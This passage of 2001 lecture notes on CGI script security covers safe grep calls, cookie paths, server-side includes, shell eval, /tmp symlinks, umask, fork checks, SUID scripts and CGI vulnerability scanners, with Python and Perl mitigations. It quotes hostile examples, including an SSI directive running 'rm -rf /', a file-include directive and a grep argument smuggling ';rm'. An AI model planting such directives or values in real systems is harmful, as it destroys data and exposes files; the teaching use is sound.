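The list-style invocation has a direct counterpart in Python's subprocess module, which starts the program without a shell when given a list of arguments. In this sketch the function names and the default file name database are assumptions; the "-e" option and the "--" marker are the ones discussed above.

```python
import subprocess

def grep_argv(exp: str, database: str = "database") -> list:
    """Build the argument vector: -e marks exp as the pattern, -- ends options."""
    return ["grep", "-e", exp, "--", database]

def run_grep(exp: str, database: str = "database"):
    """Run grep without a shell, so exp is never parsed as shell syntax."""
    return subprocess.run(
        grep_argv(exp, database),
        capture_output=True,
        text=True,
        check=False,  # grep exits with 1 when nothing matches; not an error here
    )

if __name__ == "__main__":
    print(grep_argv("root /etc/passwd;rm"))
    print(grep_argv("-i"))
```

Every troublesome value of exp from the discussion above arrives at grep as a single pattern argument, whatever quotes, semicolons, or leading dashes it contains.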

5.5 Cookie Caution

Cookies are  data that a web application can request the web client to store in the file system of the client. The web client program is expected to send the cookie back to the application upon request.  Cookies do not use any encryption.  Cookies are sent to all pages on the same server. Unless the Web application defines a restrictive path for the cookie, all Web applications on the same server (the one that sent the cookie) have access to the user's cookies. For example, after using an administrative Web application that stores the administrator password in a cookie, every page the administrator goes to on the same server can  receive the cookie with the password in it.
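
A restrictive path can be set with Python's standard http.cookies module, as in the following sketch. The cookie name session, the path /admin/, and the function name are assumptions for the example. The cookie carries an opaque token rather than the password itself, since cookies are not encrypted.

```python
from http.cookies import SimpleCookie

def session_cookie_header(token: str, path: str = "/admin/") -> str:
    """Build a Set-Cookie header limited to one path of the server."""
    cookie = SimpleCookie()
    cookie["session"] = token            # an opaque token, never a password
    cookie["session"]["path"] = path     # sent only to URLs under this path
    cookie["session"]["secure"] = True   # sent only over SSL connections
    cookie["session"]["httponly"] = True # hidden from client-side scripts
    return cookie.output()

if __name__ == "__main__":
    print(session_cookie_header("abc123"))
```

With the path restricted, other applications on the same server no longer receive the cookie with every request.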

5.6 Server-side Includes

Any of the following HTML comments would be a security hole:

<!--#exec cmd="rm -rf /"-->
<!--#include file="secretfile"-->

The second command is not as general as the first, and is less likely to be a security hole if the web server restricts the content of the file name. The simplest protection measure is to not permit the web server to parse the document for server-side includes.

5.7 Redirecting Requests

Redirecting HTTP requests bypasses access control rules. A less likely problem is redirecting the FILE protocol. It allows any file readable by the CGI to be accessed.  Some mechanisms for redirecting HTTP requests that handle both GET and POST requests may allow PUT and DELETE. Verify that PUT and DELETE requests are not accepted by the web server. 

5.8 CGI programs in C

Occasionally an author expresses a preference for compiled programs over interpreted scripts (in languages such as shell, Perl, or Python).  Such an author believes that a binary is harder to make sense of if a user obtains a copy of it, and harder to search for potential weaknesses.  This is security via obscurity.  The more essential point, however, is that the interpreter of a script generally permits powerful manipulation of text strings, parses the source of the script late, and does late binding, which makes it easier for user-supplied text to end up being interpreted as code.

Most C programs use arrays without doing bounds checking, and also have arbitrary limits on array sizes.    This enables the "buffer overflow" technique which can corrupt a program's stack so that arbitrary commands can be executed.

5.9 CGI programs in Perl

PERL gives the CGI programmer just about everything that she needs ... including a rope long enough to hang herself with.  In a previous section we considered the problem of calling the utility grep. This is a bit silly in PERL since we can easily use the regular expression facility in PERL:
while( <FILE> ){ print if /$exp/; }
This code will not cause anything nasty to be executed. The problem with this code is that an error in exp will cause the CGI script to get a compilation error (which the httpd will probably report as a server internal error). This is a poor way to handle incorrect input. Rather than manually check the syntax of a PERL regular expression, we can have PERL safely check it for us.
&complain("Illegal regexp.") if !defined eval { if ("a" =~ /$exp/){}0;};
The eval is used here as an exception handling mechanism. There are several ways of invoking eval. Summarizing from the PERL man pages, eval $x or eval "$x" is not safe, whereas eval { ... $x ... } or eval '... $x ...' is safe. Here $x is used as a string/number/whatever inside the code in the curly braces or single quotes.
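The same idea carries over to CGI programs written in Python: let the regular expression library check the pattern and report the failure as an ordinary error. A minimal sketch follows; the function names and the max_len limit are illustrative assumptions, not part of the original script.

```python
import re

def compile_user_pattern(text, max_len=200):
    """Return a compiled pattern, or None if text is not a usable regex."""
    if len(text) > max_len:          # assumed limit, to bound the work done
        return None
    try:
        return re.compile(text)
    except re.error:                 # raised for a syntactically invalid pattern
        return None

def matching_lines(lines, pattern):
    """Return the lines that the compiled pattern matches anywhere."""
    return [line for line in lines if pattern.search(line)]
```

A caller would print a polite "illegal regexp" page when compile_user_pattern returns None. Note that a syntactically valid pattern can still be very expensive to match, so this check addresses only malformed input.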

Perl provides a mechanism, via a special version of Perl called ``taintperl'' (in Perl 5, the -T command-line switch), to prevent user-supplied values (such as those from forms) from being used in eval(), system(), exec() or piped open() calls. Under this option it will also disallow calling an external program without explicitly setting the PATH environment variable at the beginning of the script.

Beware the eval statement. PERL and the shells provide an eval command that takes a constructed string and has the interpreter execute it. This can be very dangerous. Observe the following statement in the Bourne shell:

eval `echo $QUERY_STRING | awk 'BEGIN{RS="&"} {printf "QS_%s\n",$1}' `

This clever little snippet takes the query string and converts it into a set of variable assignment commands. Unfortunately, this script can be attacked by sending it a query string that starts with a ;, because the shell then treats whatever follows the semicolon as a separate command.
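The safer alternative is to parse the query string as data and never hand it to an interpreter. A minimal Python sketch using the standard library's urllib.parse.parse_qs is shown below; the wrapper name query_params is an assumption for illustration.

```python
from urllib.parse import parse_qs

def query_params(query_string):
    """Parse a query string into a dict mapping each name to a list of values.

    The values are plain strings; nothing in them is ever executed.
    """
    return parse_qs(query_string, keep_blank_values=True)
```

A script would call query_params(os.environ.get("QUERY_STRING", "")) and look names up in the resulting dictionary, so that a value such as ";rm -rf /" is just an odd-looking string.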

 

5.10 OS Environment

[ack author]

Avoid writing to publicly writable directories (such as /tmp). Creating a directory in /tmp is good provided that programs can handle the directory disappearing between invocations of the CGI script. It is easy for malicious people to create symbolic links to important files or directories -- always make sure that the file you open is the file that you wanted to modify.
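For illustration, here is a minimal Python sketch of two defensive habits: creating scratch files with unpredictable names that are guaranteed to be new, and refusing to follow a symbolic link when opening an existing file. The function names and the "cgi-" prefix are assumptions; os.O_NOFOLLOW is available on most Unix systems but not everywhere, hence the getattr fallback.

```python
import os
import tempfile

def write_scratch(data, directory=None):
    """Write data to a newly created, owner-only temporary file; return its path.

    mkstemp creates the file exclusively, so a pre-planted file or
    symbolic link with the same name cannot be reused.
    """
    fd, path = tempfile.mkstemp(prefix="cgi-", dir=directory)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path

def open_existing_no_symlink(path):
    """Open an existing file for writing, failing if path is a symbolic link."""
    flags = os.O_WRONLY | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags)   # raises OSError if the last component is a symlink
```

The caller is responsible for removing the scratch file when it is no longer needed.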

The default umask of many httpds is 0; that is, any file created by a CGI script will be world-writable by default. The umask should probably be set to 022 (allows others to read the file but not write it) or 077 (permits no access to anyone but the owner).
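A CGI program can set its own umask rather than rely on the one inherited from the httpd. The Python sketch below assumes the stricter 077 setting; the function name create_private_file is illustrative.

```python
import os

def create_private_file(path, data):
    """Create path with no group or world permissions, whatever umask was inherited."""
    old_mask = os.umask(0o077)      # returns the previous mask
    try:
        with open(path, "wb") as handle:
            handle.write(data)
    finally:
        os.umask(old_mask)          # restore the inherited mask
```

A script that creates many files could instead call os.umask(0o077) once at startup.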

Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory).

These controls are most easily maintained as follows:

5.11 Check the Result Codes

open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';

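Suppose the fork (in the open above) fails. The open then returns undef, the exec runs in the parent process, and the sendmail process is connected directly to the client. It is possible to make fork fail by simply overloading the server.  Check for the success of the fork like this:

$pid = open(MAIL, "|-");
defined($pid) || die "fork: $!";   # undef means the fork failed
# In the child ($pid == 0), run sendmail; "or" binds loosely enough to catch a failed exec.
if (!$pid) { exec('/usr/lib/sendmail', '-t', '-oi') or exit 255; }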
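The same discipline applies in other languages. As a rough Python sketch (the function name pipe_to_command and the 30-second timeout are assumptions), the code below feeds a message to an external program and reports success only when the program was started and exited with status 0:

```python
import subprocess

def pipe_to_command(argv, message):
    """Feed message (bytes) to argv's standard input.

    Returns True only if the program could be started, finished in time,
    and exited with status 0.
    """
    try:
        result = subprocess.run(argv, input=message, timeout=30)
    except (OSError, subprocess.SubprocessError):
        # OSError: the program could not be started (missing file, failed fork).
        # SubprocessError: covers the timeout case.
        return False
    return result.returncode == 0
```

With the sendmail path used above, a call would look like pipe_to_command(["/usr/lib/sendmail", "-t", "-oi"], message), and the script would show an error page when it returns False.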

5.12 SUID CGI Scripts and CGIwrap

Most web servers do not change user ID to a CGI script's owner. Instead they run the program as ``nobody'' or use a program like CGIwrap to change user ID. CGI scripts available on the net (guest books, counters and less trivial programs) assume that the CGI script will be run as nobody, so they require either files to be world-writable or CGIs to be SUID.

Making scripts SUID is dangerous if you can't trust people that have access to the machine that the script is running on.  SUID scripts have many more potential security holes than normal CGI scripts. On some operating systems it is impossible to have a secure SUID shell script. The simplest methods for attacking SUID scripts rely on setting environment variables maliciously. Almost all versions of csh are completely unsafe. (PERL calls csh to evaluate ``<*.h>'' so never use that construct in a SUID PERL program -- taint checks won't catch this problem).
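One common precaution against environment-based attacks is to run external programs with a small, explicitly constructed environment instead of the inherited one. The Python sketch below illustrates the idea; the PATH value and the name run_clean are assumptions, and a real script would use whatever directories its helper programs actually live in.

```python
import subprocess

# Assumption: every helper program lives in one of these directories.
SAFE_ENV = {"PATH": "/usr/bin:/bin"}

def run_clean(argv):
    """Run argv with only SAFE_ENV as its environment and capture its output."""
    return subprocess.run(argv, env=SAFE_ENV, capture_output=True,
                          timeout=30, check=False)
```

Variables set by an attacker in the calling environment are simply not passed on, because the child process sees only the entries of SAFE_ENV.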

The program CGIwrap is a good way to allow users to run CGIs under their own UID. 

6 CGI Scanners

Current CGI vulnerability scanners check for as many as 200 vulnerable CGIs. Below is a list of cost-free scanners.

Sitescan CGI scanner. Notable for its small size. 16Kb
ATLAS CGI hole scanner. 28Kb
Voideye CGI vulnerability scanner. Scans for 78 different vulnerabilities. 163Kb
Whisker 3.1a. Scans for over 200 known CGI vulnerabilities. 50Kb
CGI scan v2.0. Scans your network for CGI exploits. (Some texts about CGI exploits are included in the .zip file.) 50Kb
Webcheck. An excellent scanner with a lot of options. 263Kb
TWWWscanner 0.3. Windows-based WWW vulnerability scanner that looks for 186 CGI vulnerabilities. Displays the HTTP header and server info, and tries for accurate results. 263Kb
ShadowSecurityScanner v1.00.009. A freeware security scanner that checks for 17 FTP, 22 SMTP, 10 POP3 and 132 CGI vulnerabilities. 1164Kb
nessus

 


Lab Experiment


Acknowledgements  These lecture materials are gleaned from many sources.  All are presented after careful reading.  In some cases, I may have unintentionally neglected proper attribution. I assure the reader it is not because I claim authorship.  Indeed, in the lectures there is hardly anything new that I have contributed.  Suggestions for improvement are always welcome.


References

  1. Gary McGraw and John Viega, Make your software behave: CGI programming made secure, March 28, 2000, http://www-106.ibm.com/developerworks/library/secure-cgi/
  2. CGI Vulnerabilities  http://bau2.uibk.ac.at/matic/cgi2.htm
  3. The CGI authoring newsgroup (news:comp.infosystems.www.authoring.cgi)
  4. Lincoln Stein's "WWW Security FAQ" (http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html)
  5. Paul Phillips' "Safe CGI Programming" (http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
  6. Michael Van Biesbrouk's "CGI Security Tutorial" (http://csclub.uwaterloo.ca/u/mlvanbie/cgisec/)
  7. http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt
  8. W3C Security FAQ at http://www.w3.org/Security/Faq provided by Lincoln D. Stein
  9. http://www.networkcomputing.com/1105/1105ws1.html
  10. Gregory Gilliss, CGI Security Holes, Phrack 49, Volume Seven, Issue Forty-Nine, File 08 of 16
  11. PHP Manual Chapter 4: Security: www.php.net/manual/security.php3
  12. Perl CGI FAQ: Security: www.perl.com/pub/doc/FAQs/cgi/perl-cgi-faq.html#Q5.1
  13. NT Web Technology Vulnerabilities: www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2
  14. rain.forest.puppy, Perl CGI Problems, Phrack Magazine, Vol. 9, Issue 55,  file 07 of 19, Sept 09, 1999.
  15. pm-cgiExploitsList.htm
08/10/01 02:42:31 AM
Open Content Copyright © 2001 pmateti@cs.wright.edu